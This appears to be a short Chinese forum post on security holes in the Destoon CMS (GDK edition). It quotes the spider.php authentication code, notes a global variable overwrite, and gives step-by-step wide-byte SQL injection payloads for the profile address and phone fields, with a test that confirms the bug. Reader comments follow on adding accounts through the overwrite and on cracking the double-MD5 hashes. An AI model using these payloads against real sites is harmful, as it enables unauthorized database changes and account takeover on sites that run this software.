'destoon\api\spider.php
if($verify_mode == 4) exit('接口未开启');
if(strpos($_SERVER['PHP_SELF'], '/spider.php') !== false) exit('为了系统安全,请修改接口文件名');
$_DPOST = $_POST;
$_DGET = $_GET;
define('DT_ADMIN', true);
require '../common.inc.php';
//校验身份
$pass = false;
if($verify_mode == 1) {
if($_userid && $_userid == $CFG['founderid']) $pass = true;
} else if($verify_mode == 2) {
$auth = $_DPOST ? $_DPOST['auth'] : $_DGET['auth'];
if(strlen($auth) >= 6 && $auth == $spider_auth) $pass = true;
} if($verify_mode == 3) {
if($DT_IP && $DT_IP == $spider_ip) $pass = true;
}
$pass or exit('身份校验失败');
国际问题全局覆盖。自然就通杀了整套cms。
destoon gdk版注入漏洞.
先注册一个用户。填写个人资料....
在电话号码里写132456
之后确定修改
之后再改一次
在联系地址里写縗\
在联系电话里写
,telephone=787889 WHERE telephone=132456#
提交..之后你会发现联系电话变成了787889
可以确定漏洞存在
好了就说怎么多了
destoon gdk版 全局覆盖变量。这不是人家都发了吗?直接加账户,还用注入吗???
注入出来的是2次md5加密。有那么好破?
留言评论(旧系统):